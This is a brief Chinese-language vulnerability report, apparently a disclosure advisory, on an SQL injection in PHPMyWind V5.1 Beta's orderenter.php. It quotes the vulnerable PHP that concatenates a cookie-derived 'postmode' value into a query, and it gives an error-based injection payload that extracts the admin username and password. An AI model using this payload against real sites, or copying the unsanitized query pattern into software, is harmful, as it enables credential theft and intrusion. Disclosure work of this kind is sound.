PHPMyWind最新版SQL注入漏洞

### 简要描述： PHPMyWind 最新版V5.1 Beta 存在sql注入 ### 详细说明： 文件:orderenter.php ``` //初始化参数 $action = isset($action) ? $action : ''; $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart'])); $orderinfo = unserialize(AuthCode($_COOKIE['orderinfo'])); $totalprice = ''; $totalweight = ''; //商品运费 $r = $dosql->GetOne("SELECT `postprice` FROM `#@__postmode` WHERE `id`=".$orderinfo['postmode']); $postprice = $r['postprice']; ``` 参数id 存在注入 ### 漏洞证明： 构造的sql语句: SELECT `postprice` FROM `pmw_postmode` WHERE `id`=2 or @`'` AND ( SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pmw_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b) or @`'` 图片: [<img src="https://images.seebug.org/upload/201410/07170245f3c2d180a57bef9c7e15329d873f4bd9.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/07170245f3c2d180a57bef9c7e15329d873f4bd9.jpg)

//初始化参数
$action       = isset($action) ? $action : '';
$shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
$orderinfo    = unserialize(AuthCode($_COOKIE['orderinfo']));
$totalprice   = '';
$totalweight  = '';
//商品运费
$r = $dosql->GetOne("SELECT `postprice` FROM `#@__postmode` WHERE `id`=".$orderinfo['postmode']);
$postprice = $r['postprice'];